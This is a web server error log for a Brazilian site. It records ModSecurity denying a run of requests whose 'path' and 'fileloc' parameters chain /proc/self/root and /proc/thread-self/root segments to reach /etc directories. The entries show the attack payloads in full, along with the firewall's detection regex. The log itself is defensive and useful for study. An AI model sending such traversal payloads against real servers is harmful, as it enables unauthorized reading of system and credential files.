https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:50:03.358915 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.241.46:44320] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7C1ajLEzk2WiQ-10zwwAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:50:09.194888 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:44322] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7Ef9ocpUE4ed4uDwU7QAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:50:15.732926 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.241.46:53114] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7F9SswJuvopo3lOiBhgAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:50:23.603163 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:53124] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7H46lpbStxTqkSkuJkQAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:50:26.225400 2026] [:error] [pid 15061:tid 140411658000128] [client 74.7.241.46:38414] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7IqTCbgAP5jq5TehMOQAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:50:28.617120 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:38416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7JNSswJuvopo3lOiBiAAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:50:45.002893 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.241.46:57820] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7NdSswJuvopo3lOiBoAAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:50:47.495077 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.241.46:43380] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7N46lpbStxTqkSkuJrAAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:50:48.743653 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.241.46:60888] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7OP9ocpUE4ed4uDwU9AAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:51:01.601088 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.241.46:60898] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7RaQpVkWug9HeOt9VCgAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:51:17.721990 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.243.203:53312] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7VY6lpbStxTqkSkuJywAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:04.015190 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.228.16:47382] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh7hFajLEzk2WiQ-100BAAAApI"]
[Mon Mar 16 18:52:04.764059 2026] [:error] [pid 29802:tid 140411540502272] [client 74.7.241.46:49504] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7hM_BxrYCr4hPDw8L0AAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:06.086621 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.241.46:47306] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7hlajLEzk2WiQ-100CgAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:52:07.269570 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.241.46:47314] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7h1ajLEzk2WiQ-100DQAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:52:12.177591 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:40980] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7jI6lpbStxTqkSkuJ3AAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:13.500607 2026] [:error] [pid 29507:tid 140411699963648] [client 74.7.241.46:40986] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7jUr9dMAiw-8KANNqNAAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:14.884222 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.241.46:40998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7jrysWC90G-1nBrBmWQAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:16.207317 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:41014] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7kNSswJuvopo3lOiBtQAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:17.538929 2026] [:error] [pid 29507:tid 140411674785536] [client 74.7.241.46:41020] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7kUr9dMAiw-8KANNqOQAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:18.927752 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.241.46:56654] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7ktSswJuvopo3lOiBtgAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:52:20.249258 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:56660] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh7lP9ocpUE4ed4uDwVFAAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
